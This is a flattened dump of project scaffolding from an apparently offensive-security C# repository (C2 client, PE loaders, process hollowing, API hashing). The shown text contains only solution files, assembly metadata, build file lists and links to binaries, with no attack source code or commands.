https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/bin/Debug/New folder/flag.txt -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/New folder/flag1.txt: -------------------------------------------------------------------------------- 1 | got it :) -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/New folder/flag2.txt: -------------------------------------------------------------------------------- 1 | hiiiiiiiiii -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/bin/Debug/System.Management.Automation.dll -------------------------------------------------------------------------------- /C2Client/C2Client/bin/Debug/Windows Server 2016-2022-03-10-08-32-41.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/bin/Debug/Windows Server 2016-2022-03-10-08-32-41.png -------------------------------------------------------------------------------- /C2Client/C2Client/obj/Debug/C2Client.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/obj/Debug/C2Client.csproj.CopyComplete -------------------------------------------------------------------------------- /C2Client/C2Client/obj/Debug/C2Client.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\C2Client\C2Client\bin\Debug\C2Client.exe.config 2 | C:\Users\stargirl\source\repos\C2Client\C2Client\bin\Debug\C2Client.exe 3 | C:\Users\stargirl\source\repos\C2Client\C2Client\bin\Debug\C2Client.pdb 4 | C:\Users\stargirl\source\repos\C2Client\C2Client\obj\Debug\C2Client.exe 5 | C:\Users\stargirl\source\repos\C2Client\C2Client\obj\Debug\C2Client.pdb 6 | C:\Users\stargirl\source\repos\C2Client\C2Client\bin\Debug\System.Management.Automation.dll 7 | C:\Users\stargirl\source\repos\C2Client\C2Client\obj\Debug\C2Client.csproj.CopyComplete 8 | -------------------------------------------------------------------------------- /C2Client/C2Client/obj/Debug/C2Client.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/obj/Debug/C2Client.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /C2Client/C2Client/obj/Debug/C2Client.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/obj/Debug/C2Client.exe -------------------------------------------------------------------------------- /C2Client/C2Client/obj/Debug/C2Client.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/obj/Debug/C2Client.pdb -------------------------------------------------------------------------------- /C2Client/C2Client/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/C2Client/C2Client/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/API Hashing/.vs/apihashing/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/.vs/apihashing/v16/.suo -------------------------------------------------------------------------------- /Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/.vs/apihashing/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "apihashing", "apihashing\apihashing.csproj", "{68C369E0-2C4B-41AF-8207-40ECBD76E003}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {68C369E0-2C4B-41AF-8207-40ECBD76E003}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {68C369E0-2C4B-41AF-8207-40ECBD76E003}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {68C369E0-2C4B-41AF-8207-40ECBD76E003}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {68C369E0-2C4B-41AF-8207-40ECBD76E003}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {975FD9C9-29D0-4D37-B87F-F4A76F797764} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("apihashing")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("apihashing")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("68c369e0-2c4b-41af-8207-40ecbd76e003")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/bin/Debug/apihashing.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/apihashing/bin/Debug/apihashing.exe -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/bin/Debug/apihashing.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/bin/Debug/apihashing.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/apihashing/bin/Debug/apihashing.pdb -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/apihashing/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/obj/Debug/apihashing.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\apihashing\apihashing\bin\Debug\apihashing.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\apihashing\apihashing\bin\Debug\apihashing.exe 3 | C:\Users\stargirl\source\repos\WinAPI\apihashing\apihashing\bin\Debug\apihashing.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\apihashing\apihashing\obj\Debug\apihashing.exe 5 | C:\Users\stargirl\source\repos\WinAPI\apihashing\apihashing\obj\Debug\apihashing.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\apihashing\apihashing\obj\Debug\apihashing.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/obj/Debug/apihashing.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/apihashing/obj/Debug/apihashing.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/obj/Debug/apihashing.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/apihashing/obj/Debug/apihashing.exe -------------------------------------------------------------------------------- /Code Injections/API Hashing/apihashing/obj/Debug/apihashing.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/API Hashing/apihashing/obj/Debug/apihashing.pdb -------------------------------------------------------------------------------- /Code Injections/PE64Loader/.vs/PE64Loader/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/.vs/PE64Loader/v16/.suo -------------------------------------------------------------------------------- /Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/.vs/PE64Loader/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PE64Loader", "PE64Loader\PE64Loader.csproj", "{C22B5D3F-F157-44EE-A3C2-94BDBC8BDD07}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {C22B5D3F-F157-44EE-A3C2-94BDBC8BDD07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {C22B5D3F-F157-44EE-A3C2-94BDBC8BDD07}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {C22B5D3F-F157-44EE-A3C2-94BDBC8BDD07}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {C22B5D3F-F157-44EE-A3C2-94BDBC8BDD07}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {ECE60869-C952-4080-9274-20E9E27DB656} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/PE64Loader.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | "D:\red teaming tools\calc2.exe" 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("PE64Loader")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("PE64Loader")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("c22b5d3f-f157-44ee-a3c2-94bdbc8bdd07")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/bin/Debug/PE64Loader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/PE64Loader/bin/Debug/PE64Loader.exe -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/bin/Debug/PE64Loader.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/bin/Debug/PE64Loader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/PE64Loader/bin/Debug/PE64Loader.pdb -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/PE64Loader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\PE64Loader\PE64Loader\bin\Debug\PE64Loader.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\PE64Loader\PE64Loader\bin\Debug\PE64Loader.exe 3 | C:\Users\stargirl\source\repos\WinAPI\PE64Loader\PE64Loader\bin\Debug\PE64Loader.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\PE64Loader\PE64Loader\obj\Debug\PE64Loader.exe 5 | C:\Users\stargirl\source\repos\WinAPI\PE64Loader\PE64Loader\obj\Debug\PE64Loader.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\PE64Loader\PE64Loader\obj\Debug\PE64Loader.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.exe -------------------------------------------------------------------------------- /Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PE64Loader/PE64Loader/obj/Debug/PE64Loader.pdb -------------------------------------------------------------------------------- /Code Injections/PELoader/.vs/PELoader/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/.vs/PELoader/v16/.suo -------------------------------------------------------------------------------- /Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/.vs/PELoader/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PELoader", "PELoader\PELoader.csproj", "{130A7912-5C82-4ED0-BE7F-D5096D5454C0}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {130A7912-5C82-4ED0-BE7F-D5096D5454C0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {130A7912-5C82-4ED0-BE7F-D5096D5454C0}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {130A7912-5C82-4ED0-BE7F-D5096D5454C0}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {130A7912-5C82-4ED0-BE7F-D5096D5454C0}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3B8D9875-0134-4B5D-84E1-6494F0242C52} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("PELoader")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("PELoader")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("130a7912-5c82-4ed0-be7f-d5096d5454c0")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/bin/Debug/PELoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/PELoader/bin/Debug/PELoader.exe -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/bin/Debug/PELoader.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/bin/Debug/PELoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/PELoader/bin/Debug/PELoader.pdb -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/PELoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/obj/Debug/PELoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\PELoader\PELoader\bin\Debug\PELoader.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\PELoader\PELoader\bin\Debug\PELoader.exe 3 | C:\Users\stargirl\source\repos\WinAPI\PELoader\PELoader\bin\Debug\PELoader.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\PELoader\PELoader\obj\Debug\PELoader.exe 5 | C:\Users\stargirl\source\repos\WinAPI\PELoader\PELoader\obj\Debug\PELoader.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\PELoader\PELoader\obj\Debug\PELoader.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/obj/Debug/PELoader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/PELoader/obj/Debug/PELoader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/obj/Debug/PELoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/PELoader/obj/Debug/PELoader.exe -------------------------------------------------------------------------------- /Code Injections/PELoader/PELoader/obj/Debug/PELoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/PELoader/PELoader/obj/Debug/PELoader.pdb -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/.vs/process_hollowing/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/.vs/process_hollowing/v16/.suo -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/.vs/process_hollowing/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/.vs/process_hollowing/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/.vs/process_hollowing/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/.vs/process_hollowing/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "process_hollowing", "process_hollowing\process_hollowing.csproj", "{24F8470A-7F69-4516-B1BE-8235DCAEE1AE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {24F8470A-7F69-4516-B1BE-8235DCAEE1AE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {24F8470A-7F69-4516-B1BE-8235DCAEE1AE}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {24F8470A-7F69-4516-B1BE-8235DCAEE1AE}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {24F8470A-7F69-4516-B1BE-8235DCAEE1AE}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {D1DD21BB-2A0B-4220-92B8-C91A246F81D0} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("process_hollowing")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("process_hollowing")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | 